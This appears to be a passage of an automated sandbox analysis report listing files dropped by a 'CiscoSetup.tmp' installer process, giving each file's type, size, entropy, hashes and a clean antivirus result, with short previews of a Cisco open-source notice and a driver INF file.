                                                                                                                                                                                                  SHA-256:50695A74F95C74DE1888A94F9BB0DC19E0237500DDD2352D56E4A17F30324AF5
                                                                                                                                                                                                  SHA-512:BDB7E36EBE6F0A9A1F2662C89B4F253A7F354C7A5F2596EE3C52247CA25AF9A6F14B75D432B68DFACFB3611533A0E88648D5F7F3E72099AAFCA4BFA833029AAD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:<html>.. <head>.. <title>Open Source Used In Cisco AnyConnect Secure Mobility Client</title>.. </head>.. <body>.. <h1>Open Source Used In Cisco AnyConnect Secure Mobility Client</h1>.. <br/>.. <h3>Please refer to <a href="https://www.cisco.com/go/opensource">Open Source in Cisco Products</a> for the latest information on the open source used in Cisco AnyConnect Secure Mobility Client.</h3>.. <br/>.. <p><font size="2">&copy;2023 Cisco Systems, Inc. All rights reserved.</font></p>.. </body>..</html>
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):145512
                                                                                                                                                                                                  Entropy (8bit):6.622600549799495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:2lE8KKdwsPSfyPQ2TbpoEcRj+SOXzPsdGTE55vt67Ktb1sK8W77tHbloNeITqx/4:2q82KP9TbpoEI+Ew7Ktb1sKXblmeIkO
                                                                                                                                                                                                  MD5:E6FF7D48757F7470A8861AC3B3E159E6
                                                                                                                                                                                                  SHA1:3B2ED33F1025FB320D3C7D5699A941D94BBDC222
                                                                                                                                                                                                  SHA-256:74D0A04DED5E21F85BF32274823894AA5ACB9DDABE3D845F896E47521DEC2FE6
                                                                                                                                                                                                  SHA-512:312D1EDA0FAA80EC22AAD2CB660D611C1EE0207DCE84AB3A318B89CC7229993C518DDCE8B72D55A10FD85E392665394FAFEC6A320EFA84213A02360B49F8B1E1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10484
                                                                                                                                                                                                  Entropy (8bit):7.081965462144553
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Xr1RLG32vJCEvyyKwnsFWQFl2j21EhqnajKs8E:lvrnsFR72qslGs8E
                                                                                                                                                                                                  MD5:38B464383C531FF40AD2538CF4442C25
                                                                                                                                                                                                  SHA1:899E6C26E8362C3811189977640D5B625B566CD9
                                                                                                                                                                                                  SHA-256:C130160691DA77B3AFD58E642A09439709C6B60729E6CFB06EE687A02B7E2A68
                                                                                                                                                                                                  SHA-512:407AD6D59035AC10A6CBEB368F72772A6CDBB889934BA4097046BD489CA5E36D4374E5C6655485AB28419D0EB45587C664E65113589E6131FB208D7ABDB4F885
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):166264
                                                                                                                                                                                                  Entropy (8bit):6.800892494270331
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:UZqJu0h1iCPZYtIzss2wizpHB7RoSxvQ02bnt56CY2G1zVSdqXCvjC:UZqU0hStIzrQqht567ZSY+jC
                                                                                                                                                                                                  MD5:06DEEA1786C951D3CC7E24A3E714FF03
                                                                                                                                                                                                  SHA1:9906803CEDB8600C5E201AE080155BEEBD2902B2
                                                                                                                                                                                                  SHA-256:EAC4C95CD7B013E110F2CF28C08342126FE1658EF16010541F05B234D23272DD
                                                                                                                                                                                                  SHA-512:28CAA59DEEC92E417468BB0244DA2E60FAF6482EF608258E99FA47F59D3CD0EDEE69155E913034AC7B5E1AFC88DBF8F6F97058B75F0CBC6E4C045E1EE6EAADA0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):660072
                                                                                                                                                                                                  Entropy (8bit):6.659866758160457
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:kSCossJt+kPCULOLT5xylm6hSCX+JGvP755x+RpUG1m3A0KmklXz0OH9IYW4U+1M:kbAJDOLT5po+kPARgA0KmuXz0OH9H3Ov
                                                                                                                                                                                                  MD5:5E4035EF3C0EEC7E49035F5DCD6054FF
                                                                                                                                                                                                  SHA1:633A4E83FF976CF041B65B7B6B1B54C697DAB0F5
                                                                                                                                                                                                  SHA-256:31F4F3D3A3F1E1761417FD9792B4151CD8C2724F2B83AD2C51C3E9A0D4D19BE4
                                                                                                                                                                                                  SHA-512:A0BA4A69A7D0EEDACC1F25361A69CA7D73CFC893632C1033858ED08BA2DEEED00592972BCB1FF6D075AFE5E8B64291F47A3E0FF6346CC3228A6C989DF10D857E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):42600
                                                                                                                                                                                                  Entropy (8bit):6.850341851307747
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:MoodVjT3FVIgFC1wTDRDGV5ENAMxGhDGVumuAMxkEX:norjT1VImC14DdxGhfxr
                                                                                                                                                                                                  MD5:0FA61F44C8C84022B2D7BC3D2D799562
                                                                                                                                                                                                  SHA1:6AB650840B91DF72F066A3D3882E5A8891F36E07
                                                                                                                                                                                                  SHA-256:65FD7DC0ED6E034BD6A956ABC357631B87B094A3587AAF91793233CC44E813EC
                                                                                                                                                                                                  SHA-512:FBB9156C946C1D110545ABCBB663A5A6B596EC4880F3400B4824728E5EF396B0976DFAF9F6E41377F3825DC7BC9D46DDB6BEA0172C9A51CEB55636D4722460B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2392680
                                                                                                                                                                                                  Entropy (8bit):6.658300142387931
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:dFtYsvJwGcAhLrE0o5r+1mP/4qkxhDzMkfUg8Ul6:dFTNrEvmDzMkfP85
                                                                                                                                                                                                  MD5:208BC604DF1E3C9FF524C9AD9066E552
                                                                                                                                                                                                  SHA1:DC76F03E1A6851A8610FCA6A73EFCA567ADA84CB
                                                                                                                                                                                                  SHA-256:025635A4E805DA1241F752FE664C766B745C7F70DE070DC4AC87875D249150C5
                                                                                                                                                                                                  SHA-512:4A95407898D6EA16ED96208B9B94825091CA9E554A278654D71009AE04C695FEF3745BA3FF2DFFD5FF1C76DC62C58522300F0FD903F52F0A3E4F68DA5CE23892
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):436600
                                                                                                                                                                                                  Entropy (8bit):6.647435576141042
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:/gO0BGzePo6+J+4P0xYv7IQgnhUgiW6QR7t5s03Ooc8dHkC2esKcWKe0:701Po6+J+dxYv7IQgk03Ooc8dHkC2ezc
                                                                                                                                                                                                  MD5:8FF1898897F3F4391803C7253366A87B
                                                                                                                                                                                                  SHA1:9BDBEED8F75A892B6B630EF9E634667F4C620FA0
                                                                                                                                                                                                  SHA-256:51398691FEEF7AE0A876B523AEC47C4A06D9A1EE62F1A0AEE27DE6D6191C68AD
                                                                                                                                                                                                  SHA-512:CB071AD55BEAA541B5BAF1F7D5E145F2C26FBEE53E535E8C31B8F2B8DF4BF7723F7BEF214B670B2C3DE57A4A75711DD204A940A2158939AD72F551E32DA7AB03
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):89192
                                                                                                                                                                                                  Entropy (8bit):7.008180217438666
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:YWM3/1/n8silQ0Fu/ILuhcWnToIfJ9IOlIOOCxf8z5xP9YFxKQ:Je/8hWiuwLuhPTBfJ3vOCxf8JvQ
                                                                                                                                                                                                  MD5:DDD6A5364B689408B502CA21276645E1
                                                                                                                                                                                                  SHA1:B9B7643A8ADC0C1C0170DEB4834079572A0EC8D5
                                                                                                                                                                                                  SHA-256:6613A22498BD14CD46AC678F7B50675A084CA04FA923FE8F6D731C1CB703C324
                                                                                                                                                                                                  SHA-512:26661FD5918F6FDBA5C08C260534E484DC1D79A45E4797E64482B7B2E2CA8EBA1B6427984CF6072C08D5A88A3CA154F7DD1DAE73E91CB5A1D80B85B9B3DE10AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                  Entropy (8bit):5.184476593945747
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:1Bgd0zK3NIhE1bnJrGfiuzLOAYCuh35oD8d7/16U8LUFb:1Bgd0zK3NIhEpnJrGftzLO0kpoD8d7UM
                                                                                                                                                                                                  MD5:CCB4651BFC7878E5AC78F2D63955A21B
                                                                                                                                                                                                  SHA1:315E8C89BA48B0B788AC90D2FFEA97A6C0C2AF94
                                                                                                                                                                                                  SHA-256:F4427B5BAE243EED40F2B448C3137F74753E135CD001D860A7DCAB208C929217
                                                                                                                                                                                                  SHA-512:BBAF097D051F0E27EB252A639046202430F84DD1DFB30BB35E4F58A0BD24850C61957A4799E04A2A1705FC62E829CC594CB87073FDE16D47C09E216077566925
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:;;; acsock64.inf..;;;..;;; Cisco Secure Client Kernel Driver Framework Socket Layer Interceptor..;;;..;;; Copyright (c) 2004-2021 Cisco Systems, Inc. ..;;;..;;; Abstract:..;;; Callout sample driver install configuration...;;;....[Version]..signature = "$Windows NT$"..Provider = %Cisco%..DriverVer = 06/14/2023,5.0.04021.0..Class = CiscoNetworkFilter..ClassGuid = {729021b6-d014-47b0-8a6a-d2c45f77af4f} ..CatalogFile = acsock64.cat....[SourceDisksNames]..1 = %DiskId1%,,,....[SourceDisksFiles.amd64]..acsock64.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..Inspect.DriverFiles = 12 ;%windir%\system32\drivers....;..; Copy Files..;....[Inspect.DriverFiles]..acsock64.sys,,,0x00000004 ; COPYFLG_NOVERSIONCHECK....;;..;; Default install sections..;;....[DefaultInstall.ntamd64]..OptionDesc = %InspectServiceDesc%..CopyFiles = Inspect.DriverFiles....[DefaultInstall.ntamd64.Services]..AddService = %InspectServiceName%,,Inspect.Service.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):411752
                                                                                                                                                                                                  Entropy (8bit):6.881611330499658
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:0IPmqpO6R1WKsOcYY0HUxBufpzBJJJ8mdjIIIIX1Emy9uQ1jjj6eSPfp:DPN4g1oOcc0xGO6hlvPh
                                                                                                                                                                                                  MD5:0B1C614353D5012752C02F5425C1B0DD
                                                                                                                                                                                                  SHA1:1197BA2379472A303187FEA328EF79F5C6B66E46
                                                                                                                                                                                                  SHA-256:804B953D07F40A09958547947D871B06DE54D34774CA13671AF583C24114D8A2
                                                                                                                                                                                                  SHA-512:280C219212850D9EAD379D7F8223003F1DF1B180BCC27334BC2FBA27232312CA135212AA8E902B912F3265156B210017087A9D698028AF26E529E17D053425E0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):436600
                                                                                                                                                                                                  Entropy (8bit):6.647435576141042
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:/gO0BGzePo6+J+4P0xYv7IQgnhUgiW6QR7t5s03Ooc8dHkC2esKcWKe0:701Po6+J+dxYv7IQgk03Ooc8dHkC2ezc
                                                                                                                                                                                                  MD5:8FF1898897F3F4391803C7253366A87B
                                                                                                                                                                                                  SHA1:9BDBEED8F75A892B6B630EF9E634667F4C620FA0
                                                                                                                                                                                                  SHA-256:51398691FEEF7AE0A876B523AEC47C4A06D9A1EE62F1A0AEE27DE6D6191C68AD
                                                                                                                                                                                                  SHA-512:CB071AD55BEAA541B5BAF1F7D5E145F2C26FBEE53E535E8C31B8F2B8DF4BF7723F7BEF214B670B2C3DE57A4A75711DD204A940A2158939AD72F551E32DA7AB03
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21384
                                                                                                                                                                                                  Entropy (8bit):6.470094803230791
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Y32E5mpdhYQjHy3d5Wcs5gWI3KLHRN7QiUJ/AlGstm4s:YmxQSyUyAQX/xEv
                                                                                                                                                                                                  MD5:C946A9E4170F6B16D25C822DA616DC6A
                                                                                                                                                                                                  SHA1:F602D23DB756F9C3A058D3B7186D24480E05790F
                                                                                                                                                                                                  SHA-256:65BDADB5562B9473471740B1DCD8B064459A40D71A1A11FC5AEDAA855FE7635A
                                                                                                                                                                                                  SHA-512:916CAD8B1E38B2B15AB836844C5CC9D36B212831B2F553198054FE9CB5CD77AECD544CAC8040000337CEFDA9B15BF95E8903F36A9C1BEB7D579CFFF670445617
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):166264
                                                                                                                                                                                                  Entropy (8bit):6.800892494270331
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:UZqJu0h1iCPZYtIzss2wizpHB7RoSxvQ02bnt56CY2G1zVSdqXCvjC:UZqU0hStIzrQqht567ZSY+jC
                                                                                                                                                                                                  MD5:06DEEA1786C951D3CC7E24A3E714FF03
                                                                                                                                                                                                  SHA1:9906803CEDB8600C5E201AE080155BEEBD2902B2
                                                                                                                                                                                                  SHA-256:EAC4C95CD7B013E110F2CF28C08342126FE1658EF16010541F05B234D23272DD
                                                                                                                                                                                                  SHA-512:28CAA59DEEC92E417468BB0244DA2E60FAF6482EF608258E99FA47F59D3CD0EDEE69155E913034AC7B5E1AFC88DBF8F6F97058B75F0CBC6E4C045E1EE6EAADA0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):267656
                                                                                                                                                                                                  Entropy (8bit):6.547035182798101
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:+9WZ4GcvxHdmJOHpxyBIBaQ0I/Quljl1mn48MHnlwgSmiSb:+VFTmJO/BH0IYuljK48ZgS0
                                                                                                                                                                                                  MD5:2FB4C4168E379F13B15D4E299ECF3429
                                                                                                                                                                                                  SHA1:4C6702254054F288BEB49ADCDD6317575E83374D
                                                                                                                                                                                                  SHA-256:8CD7BE490AD502C9980CB47C9A7162AFCCC088D9A2159D3BBBCED23A9BCBDA7F
                                                                                                                                                                                                  SHA-512:8BC80A720CDC38D58AB742D19317FBE7C36CFB0261BB9B3D5F3B366459B2801B95F8E71FB24D85B79F2C2BC43E7EB135DAB0B81953C7007A5C01494C9F584208
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76168
                                                                                                                                                                                                  Entropy (8bit):6.765544990184352
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:zHHuqvERNjBwySXtVaSvrgOFw9RxKMn5ecbCKnIY7:zHHZMRNjKySdLcOiH5ecbCKnN
                                                                                                                                                                                                  MD5:1A84957B6E681FCA057160CD04E26B27
                                                                                                                                                                                                  SHA1:8D7E4C98D1EC858DB26A3540BAAAA9BBF96B5BFE
                                                                                                                                                                                                  SHA-256:9FAEAA45E8CC986AF56F28350B38238B03C01C355E9564B849604B8D690919C5
                                                                                                                                                                                                  SHA-512:5F54C9E87F2510C56F3CF2CEEB5B5AD7711ABD9F85A1FF84E74DD82D15181505E7E5428EAE6FF823F1190964EB0A82A569273A4562EC4131CECFA00A9D0D02AA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1224808
                                                                                                                                                                                                  Entropy (8bit):6.594618609606493
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1035368
                                                                                                                                                                                                  Entropy (8bit):6.730008187623686
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1657960
                                                                                                                                                                                                  Entropy (8bit):6.613955270280212
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):359016
                                                                                                                                                                                                  Entropy (8bit):6.617093568333673
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):145512
                                                                                                                                                                                                  Entropy (8bit):6.622600549799495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2392680
                                                                                                                                                                                                  Entropy (8bit):6.658300142387931
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):525928
                                                                                                                                                                                                  Entropy (8bit):6.663689707982956
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4467816
                                                                                                                                                                                                  Entropy (8bit):6.598146073323608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:+QCnFew3oMj8NiqvOE41lDJO2Gi3VjGClUjtbnaC:+TeOLECDJrpVSZbL
                                                                                                                                                                                                  MD5:03615EEF106C5E54C5279B05A9686B9A
                                                                                                                                                                                                  SHA1:621C9AB49367298751EAAB0E0A29575327041729
                                                                                                                                                                                                  SHA-256:7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3
                                                                                                                                                                                                  SHA-512:BFB2ADE2B66B7CCD3E1CB9FCFAD2AF8D35BD12E063ECC1D388958C5A66776CC865CDD25B72B3786011C388C9A3FF730DAF5F97D58923829DA9DBC76AD393FCE8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):660072
                                                                                                                                                                                                  Entropy (8bit):6.659866758160457
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:kSCossJt+kPCULOLT5xylm6hSCX+JGvP755x+RpUG1m3A0KmklXz0OH9IYW4U+1M:kbAJDOLT5po+kPARgA0KmuXz0OH9H3Ov
                                                                                                                                                                                                  MD5:5E4035EF3C0EEC7E49035F5DCD6054FF
                                                                                                                                                                                                  SHA1:633A4E83FF976CF041B65B7B6B1B54C697DAB0F5
                                                                                                                                                                                                  SHA-256:31F4F3D3A3F1E1761417FD9792B4151CD8C2724F2B83AD2C51C3E9A0D4D19BE4
                                                                                                                                                                                                  SHA-512:A0BA4A69A7D0EEDACC1F25361A69CA7D73CFC893632C1033858ED08BA2DEEED00592972BCB1FF6D075AFE5E8B64291F47A3E0FF6346CC3228A6C989DF10D857E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):96872
                                                                                                                                                                                                  Entropy (8bit):6.7074578724573355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:khfMwC52VJJ1NkaqH1d+VvzNRqubyXCsMAvJxMnYTxB:wfRVJJ1NkaqHP+fRqpXCsMAvIy
                                                                                                                                                                                                  MD5:4A99D4199F25191F921F0EA08948FAED
                                                                                                                                                                                                  SHA1:C1EEDF728A46CCD4FE0897FAAC3B859941AAB81D
                                                                                                                                                                                                  SHA-256:3F78B54296FF87AEF6F0FCAC9DDFF1AD93A336AC4336D2C43CD57BEEA0E22065
                                                                                                                                                                                                  SHA-512:85753CE8051EFCB5F278A722CC34F1362EF0DA1AEE494D455EC8EDEF09FE81591A3D6EFF19D623C5B743E3CAE887DC5786805EBA527333CDAFC078A0A4291335
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10484
                                                                                                                                                                                                  Entropy (8bit):7.081965462144553
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Xr1RLG32vJCEvyyKwnsFWQFl2j21EhqnajKs8E:lvrnsFR72qslGs8E
                                                                                                                                                                                                  MD5:38B464383C531FF40AD2538CF4442C25
                                                                                                                                                                                                  SHA1:899E6C26E8362C3811189977640D5B625B566CD9
                                                                                                                                                                                                  SHA-256:C130160691DA77B3AFD58E642A09439709C6B60729E6CFB06EE687A02B7E2A68
